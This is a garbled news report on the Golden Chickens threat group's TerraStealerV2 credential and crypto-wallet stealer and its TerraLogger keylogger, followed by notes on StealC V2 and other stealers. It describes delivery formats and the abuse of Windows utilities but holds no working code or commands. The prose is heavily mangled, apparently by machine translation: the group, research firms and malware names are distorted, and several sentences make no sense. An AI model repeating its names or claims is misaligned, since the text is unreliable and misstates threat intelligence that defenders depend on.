Golden chicks arrange Terrastealerv2 to steal credible data and crippto data wallet

Actors threats known as golden chicks were attributed to two new families of malware called Terrastealerv2 and Terralogger, suggesting continuous development efforts to adapt and diversify their arsenal.

“Terrastealerv2 is designed to collect browser credentials, data on cryptocurrency wallet and information on browser extension,” Future insected group recorded said. “Terralogger, as opposed to it, is a standalone keyilogger. It uses a normal low-level keyboard to recording pressure pressure and write logs to local files.”

Golden chicks, known as a vein spider, is the name of a financial motivated actor threats associated with a notorious The Malicial Software Family called More_eggs. It is known that it is active of at least 2018. years, offering its Vares under Malware-As-Service (MAAS) model.

From 2023. year golden chicks were attributed to a person known as Badbull called, the order believed to jointly manage individuals Canada and Romania. Some of the other malicious tools developed by the e-Crime group include the sea_eggs Lite (Oka Lite_more_eggs), Venomlnk, Terraloader and TerraRipt.

At the end of last year, Zscaler Trizlabzzz detailed New activities related to gold chickens that includes the rear of the called REVC2 and a loader called a poison loader, both delivered via Venomlnk.

The latest findings from the recorded future show that threat actors continue to work on their offer, releasing an updated version of their Malvera which is able to catch data from the browser, the cryptocurrency banknote and browser extensions.

Terrastealerv2 is distributed through different formats, such as executable files (Dynamic Links), Windows Installer Packages (MSI) and shortcuts (LNK) files.

In all these cases, the Lab burden was delivered in the form of the OCKS (short for Microsoft Expansion of the OLE CONTROL CONTROL), which was downloaded from the external domain (“Vetransfe (.) IO”).

“Although the targets of the Chrome Database” report “to steal credentials, does not circumvent the application encryption (Abe) Protection introduced in chrome updates after July 2024. years, indicating the obsolete of malware is obsolete or still developing, “the company with Cyber-curberism announced.

Data captured by TerrastEALex2 are also exposed to the telegram and domain “Vetransfe (.) Yo.” It also uses reliable Windows utilities, such as regsvr32.exe and mshta.exe, to avoid discovering.

Terralogger, also reproduces as an OCKS file, is engineering to record the keys. However, it does not include functionality to communicate data or command and controls (C2), suggesting that it is either early development or is intended to be used in combination with another malicious part of golden chicks Maas Ecosustem.

“Current state of TerraSteader2 and Terralogger suggests that both tools remain under active development and still not show the level of stealth that are usually connected to the mature golden chicks with tools,” said the recorded future.

“Given the history of golden chicks” Malicial Software Development for Credit and Access, these opportunities will probably continue to be developed. “

The detection comes in the middle of the new families of malware families Theft of Hannibala, Gremlin Stealerand Nullpoint which are designed to eject a wide range of sensitive information from his victims.

Also follows the discovery of an updated version Steal Malware with support for simplified command and control communication protocol (C2) and add RC4 encryption.

“Malware Delivery Options to Deliver Payment Transport Extended to include Microsoft Software (MSI) and PowerShell Scripts,” ZScaler Threatlabz said in the report was published last week.

“The redesigned control panel provides an integrated builder that allows for useful loading rules, IDs and installed hardware and installed software. Additional features include recording shots, unified screens, unified file.”

New 2.2.4. Version (aka Sterncc V2) was introduced in March 2025. years, it was noted to be distributed via the second round of loader called Amadei. The control panel also supports the bot integration telegram to send notifications and allows you to adjust the message format.

“Stealc V2 introduces improvements, such as improved useful load delivery, structured communication protocol with encryption and redesigned control panel that provides collection of information”, said Zscaler.